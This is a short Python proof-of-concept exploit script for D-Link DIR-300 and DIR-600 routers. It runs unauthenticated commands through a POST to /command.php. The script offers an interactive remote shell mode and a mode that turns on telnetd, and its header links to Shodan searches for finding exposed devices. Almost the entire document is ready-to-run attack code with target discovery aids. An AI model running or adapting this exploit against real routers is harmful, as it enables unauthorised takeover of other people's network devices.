#!/usr/bin/python # D-LINK TOTAL FAIL # http://www.s3cur1ty.de/m1adv2013-003 # Another Shit PoC by infodox # SHODANS BELOW # http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-300 # http://www.shodanhq.com/search?q=Server%3A+Linux%2C+HTTP%2F1.1%2C+DIR-600 # Who knew a shell could be so easy? import sys import requests import os if len(sys.argv) != 3: print "Usage: ./dlinkroot.py <target> <mode>" print "Modes: shell or telnetenable" print "I was lazy so I assume you have a telnet client" sys.exit(0) target = sys.argv[1] mode = sys.argv[2] def shell(target): print "[+] Connecting and spawning a shell..." while True: try: bobcat = raw_input("%s:~# " %(target)) lulz = "cmd=%s;" %(bobcat) url = "http://" + target + "/command.php" hax = requests.post(url, lulz) print hax.text except KeyboardInterrupt: print "\n[-] Quitting" sys.exit(1) def telnetenable(target): lulz = "cmd=telnetd;" url = "http://" + target + "/command.php" print "[+] Trying to enable telnet" try: hax = requests.post(url, lulz) print hax.text except Exception: print "[-] IT FAILED IT!" sys.exit(0) print "[+] Doing a telnet" try: os.system('telnet %s') %(target) except Exception: print "[-] IT FAILED IT!" sys.exit(1) if mode == "shell": shell(target) elif mode == "telnetenable": telnetenable(target) else: print "[:(] WHAT THE FUCK YOU'RE DOING IT WRONG!"